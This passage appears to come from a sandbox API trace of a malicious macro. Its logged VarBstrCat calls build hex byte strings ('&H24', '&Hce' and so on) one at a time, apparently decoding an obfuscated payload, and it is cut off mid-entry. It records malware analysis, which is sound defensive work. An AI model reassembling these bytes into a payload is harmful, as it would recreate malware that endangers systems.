(pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.950] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.950] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.950] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.950] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.950] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.950] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.950] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.951] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.951] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.951] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.951] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.951] VarBstrCat (in: bstrLeft="&H2", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.951] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.951] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.951] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.951] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.952] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.952] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.952] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.952] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.952] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.952] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.952] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.952] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.952] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.952] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.952] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.952] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.952] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.952] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.953] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.953] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.953] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.953] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.953] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.953] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.954] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.954] VarBstrCat (in: bstrLeft="&H3", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.954] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.954] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.954] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.954] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.954] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.954] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.954] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.954] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.954] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.954] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.954] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.954] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.954] VarBstrCat (in: bstrLeft="&H7", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.954] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.954] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.955] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.955] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.955] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.955] VarBstrCat (in: bstrLeft="&Hb", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.955] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.955] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.955] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.955] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.955] VarBstrCat (in: bstrLeft="&Hf", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.955] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.955] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.955] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.955] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.955] VarBstrCat (in: bstrLeft="&Hf", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.956] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.956] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.956] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.956] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.964] VarBstrCat (in: bstrLeft="&H3", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.964] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.965] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.965] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.965] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.965] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.965] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.965] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.965] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.965] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.965] VarBstrCat (in: bstrLeft="&H3", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.965] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.965] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.966] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.966] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.966] VarBstrCat (in: bstrLeft="&H7", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.966] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.966] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.966] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.966] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.966] VarBstrCat (in: bstrLeft="&He", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.966] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.966] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.967] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.967] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.967] VarBstrCat (in: bstrLeft="&He", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.967] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.967] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.967] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.967] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.967] VarBstrCat (in: bstrLeft="&H7", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.967] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.967] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.967] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.968] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.968] VarBstrCat (in: bstrLeft="&H0", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.968] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.968] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.968] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.968] VarBstrCat (in: bstrLeft="&H", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.968] VarBstrCat (in: bstrLeft="&H5", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.968] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.968] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.968] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.968] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.968] VarBstrCat (in: bstrLeft="&Hc", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.968] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.969] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.969] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.969] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.969] VarBstrCat (in: bstrLeft="&He", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.969] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.969] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.969] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.969] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.969] VarBstrCat (in: bstrLeft="&Hf", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.969] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.969] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.969] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.970] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.970] VarBstrCat (in: bstrLeft="&Hb", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.970] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.970] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.970] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.970] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.970] VarBstrCat (in: bstrLeft="&Hb", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.970] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.970] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.970] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.970] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.970] VarBstrCat (in: bstrLeft="&Hc", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.970] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.971] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.971] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.971] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.971] VarBstrCat (in: bstrLeft="&Ha", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.971] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.971] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.971] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.971] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.971] VarBstrCat (in: bstrLeft="&Hf", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.971] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.971] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.972] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.972] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.972] VarBstrCat (in: bstrLeft="&H8", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.972] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.972] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.973] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.973] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.973] VarBstrCat (in: bstrLeft="&Hf", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.973] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.973] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.973] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.973] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.973] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.973] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.973] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.973] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.975] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.975] VarBstrCat (in: bstrLeft="&H2", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.975] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.975] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.975] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.975] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.975] VarBstrCat (in: bstrLeft="&Hc", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.975] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.976] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.976] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.976] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.976] VarBstrCat (in: bstrLeft="&Hb", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.976] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.976] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.976] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.977] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.977] VarBstrCat (in: bstrLeft="&Hf", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.977] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.977] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.977] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.977] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.977] VarBstrCat (in: bstrLeft="&H8", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.977] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.978] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.978] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.978] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.978] VarBstrCat (in: bstrLeft="&H1", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.978] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.978] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.978] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.978] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.978] VarBstrCat (in: bstrLeft="&H7", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.979] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.979] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.979] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.979] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.979] VarBstrCat (in: bstrLeft="&H8", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.979] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.979] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.980] VarAdd (in: pvarLeft=0x197b94, 